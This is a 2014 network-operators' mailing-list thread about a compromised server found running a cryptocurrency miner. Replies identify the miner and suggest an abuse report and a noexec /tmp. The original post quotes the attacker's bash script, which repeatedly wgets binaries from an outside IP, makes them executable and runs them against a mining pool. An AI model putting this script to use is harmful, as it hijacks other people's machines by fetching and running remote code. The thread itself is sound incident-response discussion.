Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel

Mon, 21 Apr 2014 08:06:25 -0700 

Probably also worth making /tmp noexec so that stuff like this has a
harder time getting started.

On 20 April 2014 20:14, Gary Steers <[email protected]> wrote:
> All,
>
> This looks like its some form of crypto currency miner "xptMiner.exe", think
> that ones a RieCoin one...
>
> Undoubtedly the servers in use are compromised in some way but may be worth
> an abuse message to the contact on the RIR record in whois?
>
> Gavin, have sent you an e-mail off topic as well with a little more info,
> hope it was useful.
>
> ---
> Gary Steers
> Chief Network Engineer | Boosty
>
>
> On 20 April 2014 19:56, Gavin Henry <[email protected]> wrote:
>>
>> Hi all,
>>
>> Not usually a post you see on uknof, but wanted some help and to check
>> if anyone else has seen this?
>>
>> We've just started getting alerts from one of our servers for highload
>> and discovered a weird process:
>>
>> nagios    285936  0.0  0.0  10744  1468 ?        S    19:03   0:00
>> bash /tmp/toplel
>> nagios    292199  102  0.5 3261868 362816 ?      Rl   19:39   0:15  \_
>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
>> 2965706752
>>
>>
>> root@hostname:/tmp# ls -lh
>> total 1016K
>> -rw-r--r-- 1 nagios nagios     0 Apr 20 18:26 lllll
>> -rwxrwxrwx 1 nagios nagios   615 Apr 20 19:05 toplel
>> -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t
>>
>>
>> No idea where it came from. All our stuff has OpenSSL updated as is
>> our Nagios. w00t is a binary, toplel is a bash script containing:
>>
>> #!/bin/bash
>> if [ $1 -le 10 ] ; then
>>         NUM = $(expr $1 + 1)
>>         nohup bash $0 $NUM >/dev/null 2>&1 &
>>         exit
>> fi
>> CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
>> FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
>> FREE=$(expr $FREE - 52428800)
>> FREE=$(expr $FREE / $CORECOUNT)
>>
>> while true; do
>>         killall w00t
>>         wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
>>         chmod 777 /tmp/w00t
>>         /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
>> $FREE
>>
>>         wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
>>         chmod 777 /tmp/w00t
>>         /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
>> $FREE
>>
>>         sleep 300
>> done;
>>
>>
>>
>> --
>> Kind Regards,
>> Gavin Henry.
>>
>

Reply via email to